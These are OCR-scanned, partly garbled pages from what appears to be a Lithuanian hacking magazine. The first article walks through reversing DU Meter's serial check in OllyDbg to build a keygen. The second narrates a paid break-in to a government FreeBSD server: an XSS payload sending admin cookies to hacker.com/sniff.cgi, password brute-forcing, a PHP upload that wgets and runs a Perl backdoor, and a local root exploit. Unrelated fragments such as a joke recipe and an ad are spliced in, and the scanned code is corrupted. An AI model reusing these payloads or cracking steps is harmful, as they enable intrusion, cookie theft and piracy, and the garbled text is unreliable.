programavimo kalbą bei turėti atitinkamą programų rašymo 
įrankį (kad galėtumėm parašyti keygeną). Vietoje disasemble 
rioir derintuvo aš naudosiu OllyDbg 1.10. Iš disasemblerių dar 
būtų galima rekomenduoti /DA Pro — be jokios abejonės, tai 
geriausias produktas savo srityje. Kadangi „mūsų“ programa 
parašyta su Delphi, mes pasinaudosime pagalbiniu įrankiu 
DeDe — Delphi programų dekompiliatoriumi. Paskutines visų 
naudojamų įrankių versijas galima parsisiųsti Iš svetainės 
cracklab.ru, kur jas rasi atitinkamuose skyreliuose. Kol kas 
leiskim DeDe dekompiliuoti mūsų programą, o patys galime 
pailsėti. 


[Pradedame] Dabar atidžiai pažiūrėkime į DeDe darbo 
rezultatą. 

Mums įdomiausios bus formos TdlgRegWiz (registracijos 
dialogas) ir TdlgltcorrectSerial, o ypatingai domins šiose 
procedūrose, tiksliau pirmojoje, realizuoti klavišų nuspaudimų 
įvykių apdorotuvai. Jeigu kas nors pamiršo, tai galima dar kartą 
patikrinti, kad neteisingai įvesto pranešimo kodas pasirodo 
nuspaudus Next mygtuką, todėl žiūrim į btnNextClick. Myg- 
tuko Next nuspaudimo apdorotuvas bus adresu 00494A2C. 
Registracijos procese mes ši mygtuką turėjome nuspausti du 
kartus: pasirenkant registraciją ir ivedus licencijos informaciją, 
todėl mus domina tik pastarasis įvykis. Dabar derintuve galima 
pažiūrėti, kaip vyks įvestų duomenų nuskaitymas ir patikrini- 
mas, tuo pačiu nepamirštant žvilgtelėti į DeDe listingą. Nor- 
int šiek tiek palengvinti O/lyDbg pateikto kodo skaitomumą, 
galima pasinaudoti vienu iš jo įskiepių GODUR Jis veikia su 
IDA signatūromis ir žymiai pagerina bendrą kodo skaitomumą. 
Galima palyginti vieną kodo fragmentą prieš ir po apdorojimo 
su šiuo įskiepiu. 

Atsidarome DU Meter su OllyDbg, ties 00494A2C adresu su- 
kuriame sustojimo tašką (breakpoint) Ir paleidžiame programą 
derintuve. Nepamiršk, kad pirmą kartą mūsų sustojimo 
taškas suveiks pasirinkus registracijos metodą. todėl su F9 
paleidžiame programą veikti toliau. Ka gi, vedame savo vardą 
bei kokį nors slaptažodį ir spaudžiame Next! Štai Ir sustojome 
ten, kur reikia. Dabar svarbiausia — iš viso kodo išskirti tiktai 
tą, kuris atsako Už registracijos duomenų patikrinimą. Dabar 
per kodą eikime su F8, neužeidami į procedūras ir nesigilin- 
dami į vykdomas. Mūsų nekenčiamą langą randame adresu 
00494AAB. Ką gi, pabandykime dar kartą nuspausti Next, 
tačiau šį kartą atidžiau žiūrėkime į procedūrą, kuri iškviečiama 
adresu 0049452D. Panašu, jog tai yra būtent tai, ko mums 
reikia. Žiūrim kodą: 


00494520 PUSH 14 

0049452F CALL < IMP. Ekernel32.Sleep > 
00494534 MOV EAX,DWORD PTR DS-[4F4418] 
00494539 MOV EAXDWORD PTR DS:[EAX] 


[Keygenas su grybais] 


1 keygenas, malti pipirai, 50 g riebalų, 200 g grybų, 1 šaukštas miltų, 2 šaukštai grietinės, petražolės ir krapai. 


Gerai nuvalytą keygeną nusausinti rankšluosčiu (servetėle), supjaustyti gabalėliais, apkepinti ištirpintuose riebaluose, 


karštu vandeniu arba sultiniu, pasūdyti, pabarstyti pipirais ir uždengus patroškinti. Grybus supjaustyti ir pakepinti svieste, po 
to supilti į keygeną ir visa tai troškinti, kol bus valgoma. Skystį sutirštinti su grietine sumaišytais miltais. Keygeną pateikti 
giliuose induose. Garnyrui pateikti virtas bulves ir raugintus agurkus. 
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PINIGŲ. KAI KAS MOKETI ATSISAKĖ, KAI KAS NEGALĖJO, TAIP IR ATSIRADO ŠVIESUOLIŲ, KURIE 
ĮSIGEIDĖ IŠNARSTYTI ĮŽŪLIOSIOS PROGRAMOS VIDURIUS IR PAŽIŪRĖTI, KODĖL BŪTENT JI NENORI 
VEIKTI TAIP KAIP „NORMALI“ NEMOKAMA P|. ŽINOMA, VISA TAI MANO FANTAZIJOS, IR GALI BŪTI, 
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00494538 CALL 
00494540 DEC ES! 
0049454] JNZ SHORT DUMeter.00494520 


DUMeter, (4) Forms(e? TApplicationėeo PracessMessagesSągiv > 


Tai ciklas, kurio paskirtis — užlaikymas po duomenų įvedimo ir 
ilgų skaičiavimų imitavimas. Mums šis ciklas visiškai nereika- 
lingas. Šiek tiek žemiau matome mūsų įvestus duomenis. Tai 
ypač vaizdžiai matosi DeDe listinge. 

Visus savo apmąstymus ir spėliones tuojau pat patikriname derin- 
tuve. Patogumo dėlei aš visą laiką pašalinu anksčiau sukurtus breikus 
ir kuriu naujus, kurie yra arčiau reikiamos vietos, taip neprarandu 
laiko jau išstudijuoto kodo trasavimui. Taigi naują breiką reikia kurti 
Šiek tiek žemiau to beprasmio ciklo, Kur nors ties adresu 00494543, 
ir toliau keliauti per kodą. CMP DWORD PTR SS:/EBP-20],O pavidalo 
patikrinimas yra ne kas kita, kaip tų pačių duomenų patikrinimas. 
Trasuodami toliau (su F8) pastebim, kad duomenys nuskaitomi tris 
kartus, pats įdomiausias yra paskutinis kartas: 


004946£9 CALL < DU Meter. (eo Contralsto)TControl (eo GelTaxtŠggrv > 
004946£E MOV EO,DWORD PTR SS:ĮEBP-54] 

004944F1 XOR EDX,EDX 

004946f3 MOV EAX,DWORD PTR DS:|EBX + 3F0] 

004946F9 CALL DUMeter.00491893 

004946FE SUB EAK,-Z 

00494701 JE SHORT DUMete:.00494715 


Gali būti, kad CALL DUMeter.00491898 ir yra patikrinimas. Kad 
nereikėtų ilgai mastyti, patikrinkime savo spėlionę derintuve: 
pakeiskime EAX registre grąžintą O į 1 ir paleiskime programą. 


„ 83E8 0Z 
„v0F84 ED000000 
„„B9 2A010000 

> p 54030000 


SUB EAX,Z 


8B1 
„ FF9Z C8000000 
„ 84C0 
-„74 16 

8B93 1C030000 
„ 8B83 10030000 
„ E8 823AFBFF 
.„R9 02010000 
> 8B93 18030000 
„ 8B83 10030000 


TEST AL,AL 


00494A7D 


00434483 


JAB 
MOV EDX,DWORD PTR D! 


00494AAB||. E8 40FAFFFF 

00434A50 ||. 8BDO MOV EDX,EAX 

00454452 || . 8B83 10030000|MOV EAX,DWORD PTR DS: (EBX+310] 
00454AB5|| . E8 FF3PFBFF CALL <DUMeter 

00454AED || . 8B83 10030000|MOV EAX,DWORD PTR DS: 

00454AC5 ||. ES DC3FFBFF CALL <DUMete: 

00454AC8|| . 83F8 02 CMP EAX,Z7 


00494ACB 
00494AD1 


„+OF85 C4000000 
. 8B83 F0030000 
„ 8078 45 00 
-+OF85 B4000000 
. Bi 03000000 


00434AE1 


MOV EDX,3 


004544E6||. 8B83 10030000|MOV EAX,DWORD PTR DS: [EBX+310] 
00494AEC|[|. E8 CB3FFBFF |CALL <DUMeter.RComccr1seTPageControlūs 
00494AF1 || .„R9 SFO00000  |JMB DUMerex.00494B35 

00454AF6|| > 8DS5 FC LEA EDX,DW0RD PTR SS: [EBP-4] 

004544F5 ||. 8B83 94030000|MOV RAX,DWORD PTR DS: [EBX+394] 

O0434AFF ||. ES 68SBFCFF  |CALL <DUMeter. GControlsūTControlacetTex 


| 00454553 
DUMeter.00494895 
MOV EAX,DWUORD PTR DS: (EBX+354] 


MOV EDX,DWORD PTR DS: [RAX) 
CALL DWORD PTR DS: [EDX+C8] 


JE SHORT DUMeter.00434A33 
MOV EDX,DWORD PTR DS: 


CALL DUMeter.00448510 
DUMeter .00494B35 


MOV EAX,DW0RD PTR DS: [EBX+310] 


. B6 6C3AFBFF  |CALL DUMeter.00449510 
OD4s4k44 || „ES EC000000 DUMeter - 00494B95 
i 5 E E liukas 5 r | 


CALL <DUMeter.GDbclientaTCustomClientDatašet BCloseClursoriggrv> 


8Comctr1sRTPageČontrolėšetact 
0] 
„RComctrlsBTPageControlėCetActivePagelndex5ggrv> 


YNZ DUMeter.00494B95 

MOV EAX,DWORD PTR DS: [EBX+3F0] 
CMP BYTE PTR DS: [EAX+49],0 
INZ DUMeter.00434B95 


Registracija pavyko sėkmingai. Dabar mes tiksliai žinome, kad 
mūsų licencijos patikrinimas prasideda nuo adreso 491898. 
Sukuriame ties juo breiką ir vėl įvedame duomenis. 

Jeigu mes tingėtume kapstytis patikrinimo šiukšlėse, taip 
bandydami atstatyti kodą ir rašyti „raktų darymo Įrankį“, tai 
gali būti, Jog būtų pakankamai paprasta surastos procedūros 
pradžioje į EAX registrą įkelti reikiamą vienetuką (MOV EAX,1) 
ir sugrįžti atgal (RET), nes tuomet su bet kokiais įvestais du- 
omenimis patikrinimas baigtųsi sėkmingai, o programa būtu 
nugalėta. Tačiau jeigu jau ėmėmės paties sunkiausio, tuomet 
teks visą kellą nueiti iki pat galo. Pradedame kodo narstymą. 
Vėl keliaukime nuo adreso 00494715 iki išėjimo iš patikrinimo 
procedūros, bandant nustatyti, kurioje vietoje į EAX keliamas 
nulis. Štai ta vieta: 


00491947 MOV EAX,ESI 
00491949 POP ESI 
0049194A POP EBX 
00491948 POP FCX 
0049194C POP EX 
00491940 POP EBP 
0049194E RETN 8 


Į EAX nulis pakliūna iš ESI registro, o ESI registre matome 
kodą, kuris yra adresu 004918D4. Ką gi, mes jau visiškai 
arti. Mums jau pažįstami du nulinės eilutės patikrinimai, kurių 
adresai — 49E9C9 ir 49E9D7. Įdomesnė procedūra yra kiek 
žemiau (adresu 0049EA87), prieš kurios vykdymą į registrus 
įtraukiami mūsų duomenu adresai ir neaiškios eilutės „D3“ 


EBX+31C] 


[EBX+318] 


ivePagelndexšggrxi (| 


ivePagelndex$ggrxi 


adresa 


įek žemiau daroma taip pat, tik su eilute N4), bei kuri 


mums grąžina tą nelemtą nulį. Peržiūrim surastą procedūrą: 


48E879 (MP BITE PTR DS:Į 
1048E87C JL SHORT DUMetei.00 


7 (MP BYTE PTR DS 
A JNZ SHORT DUMe 


£.0048:879 


or 0048E5C0 


| 1.0048E964 
(MP BYTE PIR DS:[ESIJ,61 


r.0048EBAC 
ESI) 


J6 5HO 
9 ADD BYTE PTR 
C CMP BYTE P) 
JE SHORT D) 


Aptarkime šį iš pažiūros didelį kodo fragmentą. Cikle 
0048E879..0048E88A tikrinama, ar įvesti slaptažodžio sim- 
boliai priklauso intervalu! ,a..z', bei pridedami prie ASCII kodo, 
priklauso baito E0 simbolis. Keista, bet įvedimo lange 
a įvesti tik didžiąsias raides ir skaičius, todėl mūsų 
simboliai tokie būti tiesiog negali. Šiek tiek žemiau esantis 
kodas — įvesto serijinio numerio ilgio patikrinimas. Jeigu jis 
aus teisingam (18h=24 simboliai), tuomet išėjimas iš 
jūros baigsis skaudžiai. Taigi slaptažodžio ilgis mums 
as ir fiksuotas. Pakeiskime mūsų įvedamus duomenis 
r atlikime tolimesne analizę, tik šį kartą įveskime lygiai 24 
simbolius. Žemiau esantis kodas mums jau pažįstamas — čia 


al KANAL v2.7 by snaker £ 


File C:NProgram Files)DU MeteADUMeter.ene 


+ BASE64 table :: 0009B5EC :: 00493C1EC 
+ CRC32 [poly]:: 000852D4 :;: 00485ED4 
+ CRC32 [poly]:: 0008DA32 :: 0048E632 


About Clos 


Detected 3 crypto signatures (in 0.35) 


Visi žaislai vienoje vietoje 


+ 19 šalių 
* per 1,000,000 skaitytojų 
+ viena aistra 


Choose your country ks 


United Kingdom 
Germany 

Russia 

Czech Republic 
France 

Holland 

Ukraine 

Spain 

Romania 


Turkey 
China 
Philippines 
Thailand 
Taiwan 
Malaysia 
Indonesia 
Singapore 
Korea 
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tikrinama, ar simboliai priklauso mažųjų lotyniškų simbolių 
aibei. Tiesa, dabar čia pasitenkinama tik pirmuoju simboliu, 
kuris sulyginamas su raide D, ir jeigu jie nelygūs, patikrinimas 
vėl baigiasi nesėkme. Dar žemiau antras simbolis sulyginamas 
su skaičiumi 3. Vėl keičiame įvedamą kodą, kuriame pirm- 
ieji simboliai yra D3 (prisiminkime procedūrai perduodamą 
eilutę, apie kurią buvo kalbama anksčiau). Nepamirškime 
breikų perkelti į naujas pozicijas, dabar jis turi būti ties adresu 
0048E8C6, kadangi mes jau peržiūrėjome ilgio bei pirmujų 
dviejų įvedamų simbolių patikrinimą, o mūsų naujasis numeris 
šiuos patikrinimus praeina. Toliau keturis kartus iškviečiama 
procedūra CALL 0048E5EA. Jos paskirtis — gauti simbolius iš 
eilutės, eilutės ilgis yra ECX registre, eilutės adresas — EDX 
registre. Aš prie šių iškvietimų derintuve sukūriau simbolinį 
Komentarą — Copyl(S,1.ecx). Šiaip tai ganėtinai naudinga 
prie jau peržiūrėtų procedūrų įkelti savus komentarus — taip 
pagerėja derintuve matomas kodo vaizdas ir patys nesusipaini- 
osim tarp procedūrų iškvietimų. Žiūrim, kokių mūsų slaptažodžio 
dalių reikia programai. Pirmasis iškvietimas iškerpa 3 simbolius 
(pradedant nuo ketvirto), antras — 8 simbolius (pradedant 
nuo 8-to), trečias — paskutinius 8 simbolius, ketvirtas — 16 
pirmųjų simbolių. Pavadinkime šias eilutes 1, 2, 3 ir 4. Taip 
išeina, kad pas mus su trečiu, septintu ir šešioliktu simboliu 
nieko nedaroma, t.y. jie gali būti bet kokie (kol kas tai dar tik 
preliminarūs duomenys). Pakeiskime šiuos simbolius klasiki- 
niu brūkšneliu. Taip gauname štai tokio pavidalo numeriuką: 
D3-XXXJYXXXX-XXXXXXXX, kur X — nežinomos (kol kas) 
didžiosios lotynų abėcėlės raidės ir skaičiai. Aš įvedžiau 
D3-456-89012345-78901234. Telieka išaiškinti visus 
likusius simbolius. Suprasti procedūros CALL 0048E80C 
paskirtį nesunku: ji eilutėje surastas mažąsias raides 
konvertuoja į didžiąsias bei eliminuoja tarpus, jeigu jų yra. 
Vietoje eilutės -— bet koks vardas. O kita iš eilės procedūra 
su transformuotu vardu atlieka tam tikras gudrias manipuli- 
acijas 


0048E680 
0048E683 
0048E686 
0048E688 
0048E68A 
0048E6C0 
0048E6C2 
0048E604 
0048E607 


SHL EDL A 

MOVSX EOKBYTE PTR DS:[EAX] 
ADD EDXEO 

MOV EO,EDX 

AND ECK,FO000000 

TEST EO,EO 

JE SHORT DUMeter 0048E6CF 
SHR EC,18 

XOR EDKECŲ 

0048E69 AND EDI, OFEFFFFF 

0048E6CF INC EAN 

0048E600 CHMP BYTE PTR DS:[EA(],0 
0048E603 INZ SHORT DUMeter.0048E6B0 


Šį kodą aptarkime kiek išsamiau: skaičiaus pastūmimas į 
kairę (SHL) vienu bitu ekvivalentiškas jo padauginimui iš 2. 
Pas mus skaičius stumiamas per 4 bitus, tai reiškia, kad 
dauginama iš 16. Sukaupiama vardo simbolių kodų suma, kuri 
po kiekvieno sumavimo padauginama iš 4. Kai vardas ilgas 
ir suma artėja prie DWORD formato perpildymo (programa 
tuomet nulūžtų su klaida), ji perstumiama į dešinę per 24 
bitus (dalinama iš dviejų 24 laipsniu). AND ECX,F0000000 
ir po to kitas perėjimas tikrina vienetuko buvimą viename iš 


4 pirmųjų skaičiaus bitų. Dabar mes bet kokia mums patogia 
kalba galėsim šią procedūrą atstatyti per porą minučių, pan- 
audodami paprasčiausius aritmetinius veiksmus arba logines 
operacijas, kaip ir padaryta būtent šioje programoje. Čia 
viskas priklauso nuo patogumo ir įpratimo. Važiuojam toliau. 
Tolimesnė procedūra dirba su iškirpta 1 eilute, t.y. įvertinus 
mūsų įvestą kodą, su eilute „456“. Iš pradžių patikrinamas 
ilgis— čia viskas gerai. O kiti trys vienos procedūros Iškvietimai 
grąžina kiekvieno mūsų eilutės „456“ simbolio eilės numerį 
eilutėje „ABCDEFGHIJKLMNOPORSTUVWXYZ987654*. T.y. 
simboliui 4 tai bus 32, 5 — 31 ir nulis, jeigu įvesto simbo- 
lio iš viso nėra didžiojoje eilutėje. Procedūros pabaigoje šie 
eilės numeriai šiek tiek transformuojami į gautinį rezultatą. 
Procedūra CALL 0048E7B8B visiškai paprasta. Ji eilutę 
transformuoja į skaičių (Delphi funkcija StrTolnt). Ši funkcija 
iškviečiama du kartus: pirmą kartą transformuojama eilutė 2, 
antrą — eilutė 3. Atkreipk dėmesį, kad iš eilutės 2 gauna- 
mas skaičius po to sulyginamas su skaičiumi, gautu po įvesto 
vartotojo vardo transformavimų, t.y. jie turi būti lygūs. Atlikę 
tokį patį transformavimą su vardu (mes jį jau aptareme kiek 
aukščiau), koks atliekamas pačioje programoje, mes galime 
gauti dalį teisingo serijinio numerio. Vardas Ara buvo trans- 
formuotas į skaičių 4661, o tai reiškia, kad mūsų kodas bus 
D3-456-00004661 78901234, kur mums jau žinoma pirmoji 
ir trečioji jo dalis. Žiūrim toliau... Mums lieka visiškai nedaug: 
išnagrinėti procedūrą, kuri dirba su 4 eilute. 0048E953 adresu 
esanti funkcija apskaičiuoja mūsų 4 eilutės CRC32 (prisimink, 
ką mums parodė KANAL įskiepis), po to su anksčiau iš vardo 
funkcijos grąžinta reikšme atliekama operacija XOR ir gautas 
rezultatas palyginamas su paskutine įvesto kodo dalimi. Jeigu 
viskas teisingai, tuomet mes įvedėme teisingą kodą. Mes čia 
neaptarinėsime CRC32 algoritmo veikimo, kadangi yra daugybė 
šį algoritmą pritaikančių gatavų išeities tekstų ir komponentų, 
kuriuos mes ir naudosime rašydami keygeną. 

Vieną minutėlę... 

Lieka vienas niuansas, susijęs su 1 eilute, Jos transformavimų 
rezultatas toliau nėra naudojamas, t.y. jos vietoje galima 
įterpti bet kokius simbolius (didžiąsias lotyniškas raides). 
Tačiau kai kurie žmonės tvirtina, kad jie vis dėlto naudojami 
slaptuose patikrinimuose, todėl praejus tam tikram laikui tokia 
registracija tampa negaliojanti. Bet tokios skambios frazės be 
konkrečių kodo fragmentų arba paslėptų patikrinimo procedūrų 
dar nieko neįrodo, o pas mane (ir pas kitus) ši programa jau 
seniai puikiai veikia. Tos pačios nuomonės yra ir EGOiST/TSRh, 
Šiai programai skirto keygeno, kuris buvo parašytas jau seniai, 
autorius. Naudodamasis proga, atskirai dėkoju EGOiST'ui už 
suteiktą pagalba ir konsultacijas rašant šį straipsni. 


[Keygeno kūrimas] Mes išaiškinome serijinio numerio pa- 
tikrinimo algoritmą. Dabar aptarkime mūsų būsimo keygeno 
darbo algoritmą. Pirmieji trys serijinio numerio simboliai „D3-“ 
yra pastovūs bet kokiam vardui. Kiti trys taip pat gali būti 
bet kokie. Skaičius, gautas po su jais atliktų manipuliacijų, 
vėliau niekur nenaudojamas. Kita serijinio numerio dalis bus 
generuojama pagal įvestą vartotojo vardą, o paskutinė bus 
visos iki tol gautos eilutės CRC32 rezultatas. Tau telieka i 
vieną visumą apjungti šį algoritmą ir įgyvendinti jį su tavo 
mėgstama programavimo kalba. Linkiu sėkmės purenant re- 
verse-engineering'o dirvą. 


Padaryta vyriausybė 
Vyriausybinio „FreeBSD“ 

serverio „local root“ 

PERŽIŪRINĖDAMAS ĮVAIRIUS SECURITY 
FORUMUS, AŠ PASTEBĖJAU ŽINUTĘ, KU- 
RIOJE GERAS ŽMOGUS SIŪLĖ NULAUŽTI 
KAŽKOKĮ SVARBŲ POLITINĮ RESURSĄ. 
UŽ GAUTĄ PRIĖJIMĄ ROOT TEISĖMIS JIS 
ŽADĖJO PAKLOTI 300 ŽALIŲJŲ PREZIDENTŲ. 
ŠIAIP JAU AŠ NESU MĖGĖJAS LAUŽTI 
PAGAL UŽSAKYMĄ, TAČIAU TĄ ŠALTĄ 
IR NUOBODŲ VAKARĄ AŠ KAŽKODĖL 
PANŪDAU ŠIEK TIEK PASIMANKŠTINTI IR 
SUORGANIZUOTI SERVERIUI NUODUGNŲ 
PATIKRINIMĄ. 


[Rippers? Fuck!) Prieš imdamasis darbo nusprendžiau 
šiek tiek apsisaugoti ir šį vaikiną patikrinti riperių 
bazėje. Aš mikliai pasibeldžiau pas gana kokybišką 
botą, kuris normaliai funkcionuoja ir šiandien (jo uin 
yra 4474744), ir sušėriau jam tokią komandą: !rip- 
per [nick], į ką man botas maloniai atsakė: [nick] is 
not in our database. Susisiekęs su geru žmogumi, aš 
gavau hosią ir mes greitai išsiskyrėm, kiekvienas su 
savais reikalais. 


[In attack] Savo įsilaužimą aš nusprendžiau pradėti 
nuo informacijos apie serverį surinkimo. Iš pradžių su 
whois aš sužinojau serverio IP adresą. Po to aplan- 
kiau aukos svetainę, kurioje mane pasitiko nemažai 
skriptų, skurdokas dizainas bei du elektroninio pašto 
adresai (vienas kurių, mano nuomone, priklausė ad- 
minui: benny(Oserv.gov). Visas varikliukas veikė su 
php, tačiau tai manęs kažkaip visai nedžiugino. Toliau 
aš veikiau standartiškai: nutolusiame shelle paleidau 
nmap su vėliavėlėmis -O ir -sV (nustatyti operacinės 
sistemos versiją ir tinklo servisus) bei sukomandavau 
jam skenuoti 21, 22, 23, 25, 110, 80, 3306 jungtis. 
Po kurio laiko pridusęs nmap man pateikė ataskaitą 
apie serverį, kurioje teigė, kad, pavyzdžiui, per 21 
jungtį veikė ProFTPD 1.2.1, o Sendmail buvo šiltai 
įsitaisęs per 25, deja, šiai MTA versijai eksploito aš 
neturėjau, 0 viešai prieinamo neieškojau, kadangi tai 
beprasmiška. Per 80 jungtį pagal nutylėjimą veikė 
Apache, per 3306 veikė vienos paskutinių versijų 
mysąl. Išanalizavus mano gautą informaciją, | servisų 
atakas buvo nuspręsta spjauti (kol kas) ir prie serverio 
prieiti iš kitos pusės. 


[Another side] Kitą rytą man nieko kito neliko, kaip tik 
užsiimti atakuojamame serveryje veikiančios svetainės 
tyrinėjimais ir ten ieškoti laimės. Aš užėjau į svetainę ir 


dar kartą joje apsižvalgiau. Perbėgęs per nuorodas, aš neradau 
nei ipb, nei skylėtojo phpBB. Čia taip pat nebuvo jokios viešai 
prieinamos programinės įrangos, kas dar kartą bylojo apie tai, 
kad serveris gerai apsaugotas. Tokio tipo serveriuose paprastai 
būna daugybė įvairiausių katalogų ir bylų, kurių ieškoti man 
padėjo mano nuo seno pamėgtas skeneris Nikto. Dabar man 
reikėjo skenerį užsiundyti ant savo aukos, ką aš ir padariau. 
Po 5 minučių aš jau galėjau mėgautis savo monitoriaus ekrane 
besipuikuojančiais rezultatais. Deja, aš neradau daug katalogų, 
tačiau skeneris vis dėlto kai ką parode: 


htip://seiv.gov/a/admin.php [2000k] 
hip://serv.gov/users/pub/ [2000k] 


Pirmoji nuoroda vedė tiesiai į administravimo zoną, apie kurią aš 
jau seniai įtarinėjau, o antroji dėl teisingai sukonfigūruotų teisių 
manęs iš viso niekur nenuvedė. Patikrinęs, ar teisingai pirmoji 
nuoroda mane nukreipia į administravimo zoną, aš pradėjau ka- 
pstytis giliau. Po to man dar teko susidurti su daugybe skriptų, 
tačiau po jų patikrinimo aš negavau pageidaujamo rezultato. Jau 
ruošiausi iš ten dingti, kai staiga viename puslapyje pastebėjau 
nedidelę kažkokiems politiniams debatams skirtą formą. Forma 
turėjo du laukus: vardą ir pranešimo tekstą. Man iš karto 
kilo mintis patikrinti šią forma ir jos laukus, kad pažiūrėčiau, 
kaip veikia filtrai. Aš nesuklydau. Iš pradžių pabandžiau įterpti 
standartinį javascript kodą: <script>alert(.xss*): </script > „tačiau 
atgal gavau spyrį į pasturgalį. Tuomet aš nusprendžiau išmėginti 
prieinamus tagus, kurie naudojami rašant žinutes. Mano piktas 
žvilgsnis krito ant dviejų prieinamų tagu — [img] ir [color), iš kurių 
pastarasis man padės tolimesniuose žygdarbiuose :). Taigi paban- 
dykime išsamiau aptarti tolimesnius mano veiksmus. Man reikėjo 
sukurti xss eksploitą, tada užsiundyti jį ant admino sausainukų, 
0 po to pabandyti juos perimti su paprasčiausiu sniferiu. Po 10 
minučių testavimo priešiškas javascript kodas buvo paruoštas. 
Papasakosiu apie tai išsamiau. Iš pradžių aš pabandžiau sukurti 
štai tokį pranešimą: /color= “red*|Test[/color]. Žodelis „Test“ buvo 
sėkmingai atvaizduotas raudona spalva. Po to aš šį pranešimą 
perdariau į tokia konstrukciją, kuri išspjaudavo paprasta XSS 
perspėjimą: 


[color red“ style= background-image:u|(javaseript:alert(„XSS")),| Test! |/color] 


Tokį eksploitą jau nesunku papildyti taip, kad hakerio svetainėje 
įdiegtas sniferis periminėtų blogiečio paliktą pranešimą 
peržiūrinčių nelaimėlių sausainukus. Galutinis eksploito vari- 
antas nera labai sudėtingas: 


bockground-image:ul[jovasaiipt:  documen!.images|1]. 
sit "http://hacker, com/tai- 
bin/sniff.cgi2s:" + document: 
cookie]Hiadmin! |/color] 


Įcolor=16d“ style 


Kaip matai, eksploito 
kūne aprašyta nuoro- 
da į sniferį (sniff.cgi), 
kuris už mane atlieka 
2! visą pagrindinį darbą. 
' Dabar man telieka 
laukti, kol atlėpausis 
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Šiai kaip veikia nperių paieškos botas 
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adminas perskaitys mano 
paliktą žinutę. Ilgai laukti 
nereikėjo ir vakare pas mane 
pasipylė pirmieji perimti ku- 
kiai. Atėjus nakčiai, tarp 
aukų sušmėžavo ir admino 
sausainukas. Tai, kad jis buvo 
admino, aš iš karto supratau 
pagal jo prisijungimo vardą 
(benny). Taip, tai tas pats 
benny, kuris paliko savo 
pašto adresą pagrindini- 
ame svetainės puslapyje :). 
Sausainukuose viskas buvo 
standartiška: slaptažodžio hešas, vartotojo vardas ir t.t. Aš 
parsisiunčiau išties padorią per tokį laiką surinktų slaptažodžių 
bazę ir ant jos užsiundžiau brutforserį (PasswordPro), po ko 
ramiai nuėjau miegoti. 

Aš jau ruošiausi iš ten dingti, kai staiga viename puslapyje 
pastebėjau nedidelę kažkokiems politiniams debatams skirtą 
formą. 


Daugybę įvairiausių skiAir 
goms sistemos skirtų roctkitų 
ud asi! Ča 
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[Welcome to admin zone] Kitą rytą aš užsiplikiau puodelį ka- 
vos, prisėdau prie kompiuterio ir pradėjau peržiūrinėti brutforso 
darbo rezultatus. Pastarieji mane maloniai nustebino tuo, kad 
brutforseris eilinį kartą išgelbėjo mano sėdynę ir negailestingai 
išspjovė dešifruotą slaptažodį. Dabar mano kelias vedė tiesiai 
| administravimo zoną. Čia aš patekau pasinaudojęs aukščiau 
paminėta nuoroda. Administratoriaus skydelis buvo ganėtinai 
funkcionalus ir gerai apgalvotas. Čia buvo galima redaguoti 
naujienas ir svetainės skyrelius, kurti savo balsavimus, keisti 
įvairią politinių apklausų statistiką, pridėti naujus adminus, red- 
aguoti užsiregistravusių vartotojų informaciją ir t.t. Tačiau man 
reikėjo kažko labiau apčiuopiamo, už ko aš galėčiau užsikabinti 
ir pratęsti savo įsilaužimą. Tokia galimybė atsirado. Dar kiek 
laiko pasikapstęs administratoriaus skydelyje, aš suradau vieną 
dlažnai sutinkamą opciją — paveikslėlių (gif) persiuntimą į serverį. 
Adminui ši opcija buvo reikalinga tam. kad jis galėtų svetainėje 
talpinti įvairius politinius „snukelius“. Tada aš su paprasčiausiu 
notepad atsidariau savo gif'a ir į jį įrašiau štai tokią eilutę: 


2 systom (cd lmp; wget http://hacker.com/bd.pl;chmod 755 bd.pl; perl 
bd.pl „)2> 


Čia pereinama į katalogą /tmp, kuriame paprastai leidžiama 
rašyti visiems, po to parsiunčiamas paprasčiausias per! 
backdooras (bd.pl), jam suteikiamos atitinkamos teisės ir 
Jis paleidžiamas web serverio teisėmis, po ko backdooras 
prisibindina prie 32767 jungties. Visa tai aš išsaugojau į 
bylą mora4.php ir pabandžiau persiųsti į svetainę, tačiau 
teko gauti dar vieną gaivinantį spyrį. Tuomet aš nusprendžiau 
pagudrauti ir pakeičiau bylos praplėtimą iš .pAp į „gif.php. Ir 
ką tu manai? Paveikslėlis buvo sėkmingai perkeltas! Aš atsi- 


pirmoji komanda, Kuri visada džiugina akį 
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dariau paveikslėlio nuorodą ir užkroviau ją savo naršyklėje, 
tačiau ji ilgai nenorėjo krautis, kas bylojo apie tai, jog bekdoras 
sėkmingai persiųstas ir paleistas. Dabar aš kaip ir anksčiau 
parsisiunčiau langinėms skirtą netcat ir pabandžiau prisijungti 
prie mano serverio: 


CA>1C ywwservot. gav 32767 


Pirmoji komanda who buvo įvykdyta sėkmingai. Beje, tuo metu 
sistemoje aš buvau vienas, o tai reiškia, kad kelias buvo atviras 
ir reikėjo greitai priimti sprendimą. 


[Root me plz] Taigi pusė kelio nueita, tačiau man, be jokios 
abejonės, shello su apribotomis teisėmis neužteko, 0 pinigų 
manija mane galutinai užvaldė Ir stūmė tolimesniems ryžtingiems 
veiksmams. Reikėjo rootinti, raotinti ir dar kartą rootinti. Uname 
-a man parodė tenykštę operacinę sistemą. Tai buvo mano sena 
draugė FreeBSD 4.3. Keista, aš tikėjausi rasti šviežesnę versiją :). 
Tiek jau to, nuo to man tik geriau. Ši fryškės šaka pažeidžiama, ką 
patvirtina Georgi Guninski (www.guninski.com) eksploitas. Klaidos 
esmė paprasta iki negalėjimo: vykdant exec() išvalomi ne visi 
signalų apdorotojai, kas leidžia į suid programa įterpti savo koda. 
Sėkmingai parsisiuntęs eksploitą, aš jį sukompiliavau ir gavau palei- 
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eksploita fragmentas su kenksmingų shellkodu 


[FreeBSD 4.3 local root] 

Vasarą, prieš tris metus gerai žinomas Žora Guninskis FreeBSD 
4.3 ir ankstesnėse sistemose surado rimtą problemą. Klaida 
buvo aptikta signalų apdorotuve rfork(RFPROC |RFSIGSHARE).. 
Suid programoje vykdant xec(), nebuvo išvalomas šis sig- 
nalas, kas hakeriui leisdav4 į vykdomą bylą su suid bitu įdiegti 
bet kokį kodą. Kaip nesunku suprasti, lokaliai panaudotas 
toks įrankis padeda greitai gauti root teises, ką sėkmingai 
įgyvendino šio straipsnio autorius. Šio šarvamušio eksploito 
kodą galima gauti čia: ww.guninski.com/wfreebsd.c. 


dimui paruoštą programą, kun tik ir laukė, kol kas nors ją paleis :). 
Ka gi, lūkesčiai greitai išsipildė, o mano privilegijos po kelių minučių 
pasidarė nulinės, kas reiškė, kad mano rankose buvo root teisės. 
